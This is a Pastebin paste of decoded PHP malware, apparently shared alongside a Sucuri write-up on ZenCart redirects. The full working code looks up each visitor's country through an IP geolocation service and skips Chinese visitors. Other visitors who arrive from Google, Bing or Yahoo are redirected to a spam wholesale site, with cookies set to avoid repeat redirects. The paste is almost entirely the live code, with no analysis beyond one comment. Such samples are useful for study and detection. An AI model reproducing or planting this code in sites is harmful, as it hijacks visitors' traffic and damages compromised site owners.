Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- /* new version of the decoded malware.
- Check http://blog.sucuri.net/2014/02/mysterious-zencart-redirects-leverage-http-headers.html for details
- */
- error_reporting(7);
- $check ="shine-check";
- $check2 ="twotime";
- $adsen_code ='';//插入谷歌广告
- $CookieTime=0;
- function getIP()
- {
- static $realip;
- if (isset($_SERVER)){
- if (isset($_SERVER["HTTP_X_FORWARDED_FOR"])){
- $realip = $_SERVER["HTTP_X_FORWARDED_FOR"];
- } else if (isset($_SERVER["HTTP_CLIENT_IP"])) {
- $realip = $_SERVER["HTTP_CLIENT_IP"];
- } else {
- $realip = $_SERVER["REMOTE_ADDR"];
- }
- } else {
- if (getenv("HTTP_X_FORWARDED_FOR")){
- $realip = getenv("HTTP_X_FORWARDED_FOR");
- } else if (getenv("HTTP_CLIENT_IP")) {
- $realip = getenv("HTTP_CLIENT_IP");
- } else {
- $realip = getenv("REMOTE_ADDR");
- }
- }
- return $realip;
- }
- /**
- * 获取 IP 地理位置
- * 淘宝IP接口
- * @Return: array
- */
- function getCity($ip)
- {
- $url="http://ip.taobao.com/service/getIpInfo.php?ip=".$ip;
- $ip=json_decode(@file_get_contents($url));
- if((string)$ip->code=='1'){
- return false;
- }
- $data = (array)$ip->data;
- return $data;
- }
- $ip=getIP();
- $data=getCity($ip);
- if($data){
- if($data['country_id']=='CN'){ //判断是否中国IP
- setcookie("USERID", "twotime", 0,"/","");
- }
- else
- {
- $target_url=array();
- //$target_url[0]="http";
- for($i=0;$i<79;$i++)
- {
- $target_url[$i]="http://www.goodsellwholesaler.com";//这里改成你要跳转的网址
- }
- for($i=80;$i<100;$i++)
- {
- $target_url[$i]="mailto:hackseo@post.com";
- }
- function rand_array($arr)
- {
- $arr_size=sizeof($arr);
- $tmp_arr=array();
- for($i=0;$i<$arr_size;$i++){
- mt_srand((double) microtime()*1000000);
- $rd=mt_rand(0,$arr_size-1);
- if($tmp_arr[$rd]=="")
- {
- $tmp_arr[$rd]=$arr[$i];
- }
- else
- {
- $i=$i-1;
- }
- }
- return $tmp_arr;
- }
- $attack_url=rand_array($target_url);
- $attackurl="www";
- $l1=$_SERVER["HTTP_ACCEPT_LANGUAGE"];
- if(isset($_SERVER['HTTP_REFERER'])){
- $a1 = $_SERVER['HTTP_REFERER'];
- } else {
- $a1 = '';
- }
- $l2="zh";
- $a2="bing";
- $a3="com.hk";
- $a5="google";
- $a4="yahoo";
- if (( strpos($l1,$l2) === false )and( ( strpos($a1,$a3) == false ))and(( strpos($a1,$a2) == true )or( strpos($a1,$a5) == true )or( strpos($a1,$a4) == true )) and ( strpos($attack_url[1],$attackurl) == true )) {
- setcookie("USERID", "shine-check", 0,"/","");Header("Location: $attack_url[1]");}
- else
- {
- setcookie("USERID", "twotime", 0,"/","");
- }
- }
- }
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement